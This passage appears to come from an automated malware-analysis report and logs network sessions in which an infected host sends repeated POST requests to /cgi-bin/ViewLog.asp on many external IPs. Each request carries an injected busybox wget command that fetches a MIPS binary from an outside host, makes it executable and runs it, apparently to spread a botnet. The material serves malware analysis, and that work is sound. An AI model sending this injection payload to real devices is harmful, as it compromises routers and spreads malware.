                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 2e 6c 6f 63 61 6c 64 6f 6d 61 69 6e 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache Server at localhost.localdomain Port 8080</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              313192.168.2.145173631.136.187.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.822406054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:38.373104095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:39.493006945 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:41.733031988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.340743065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.300364971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.963615894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.826060057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              314192.168.2.144304831.136.188.1768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.826046944 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:38.405054092 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:39.556993961 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:41.988944054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.596772909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.812350988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.011552095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.873970985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              315192.168.2.144221494.122.110.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.867089987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              316192.168.2.143905262.29.47.2278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:41.369776011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              317192.168.2.145411862.29.125.458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:41.369827032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              318192.168.2.146035485.214.224.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:41.805562019 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:42.006109953 CET1229INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 1012
                                              Date: Thu, 23 Nov 2023 04:16:41 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
